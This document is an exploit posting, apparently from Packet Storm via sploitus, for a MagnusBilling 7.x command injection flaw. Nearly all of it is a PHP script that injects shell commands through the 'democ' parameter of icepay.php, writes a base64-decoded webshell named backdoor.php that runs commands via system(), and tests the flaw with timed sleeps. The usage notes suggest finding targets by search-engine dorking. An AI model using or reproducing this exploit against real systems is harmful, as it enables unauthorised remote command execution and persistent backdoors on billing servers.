## https://sploitus.com/exploit?id=PACKETSTORM:182167
=============================================================================================================================================
| # Title : MagnusBilling 7.x Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.magnusbilling.org/ |
=============================================================================================================================================
POC :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] uses the CURL to Allow remote command .
[+] Line 83 set your target .
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php
[+] PayLoad :
<?php
class MagnusBillingExploit {
private $targetUri;
private $webShellName;
public function __construct($targetUri) {
$this->targetUri = $targetUri;
}
// Function to execute commands on the target
public function executeCommand($cmd) {
$url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#';
return file_get_contents($url); // Send HTTP request
}
// Function to execute PHP code on the target
public function executePhp($cmd) {
$payload = base64_encode($cmd);
$url = $this->targetUri . '/lib/icepay/' . $this->webShellName;
$postFields = [$this->postParam => $payload];
return $this->sendPostRequest($url, $postFields); // Send POST request
}
// Upload backdoor webshell to the target
public function uploadBackdoorWebShell() {
// Name of the webshell to be uploaded
$this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file
// Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd')
$backdoorCode = "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>";
// Encode the webshell content
$encodedPayload = base64_encode($backdoorCode);
// Construct the command to upload the backdoor
$cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}";
// Execute the command to upload the backdoor
return $this->executeCommand($cmd);
}
// Check if the target can be exploited
public function check() {
$url = $this->targetUri;
$response = file_get_contents($url);
if (!$response || !preg_match('/MagnusBilling/i', $response)) {
return "Safe: Likely not a MagnusBilling application.";
}
$sleepTime = rand(4, 8);
$this->executeCommand("sleep {$sleepTime}");
sleep($sleepTime); // Simulate blind command injection
return "Vulnerable: Command injection successful.";
}
// Main function to exploit the target
public function exploit() {
echo "Uploading backdoor...\n";
$result = $this->uploadBackdoorWebShell();
if (!$result) {
die("Backdoor upload failed.");
}
echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n";
}
// Helper function to send POST requests
private function sendPostRequest($url, $postFields) {
$options = [
'http' => [
'method' => 'POST',
'header' => 'Content-Type: application/x-www-form-urlencoded',
'content' => http_build_query($postFields)
]
];
$context = stream_context_create($options);
return file_get_contents($url, false, $context);
}
}
// Usage example
$exploit = new MagnusBillingExploit('http://target-url/mbilling');
$exploit->exploit();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================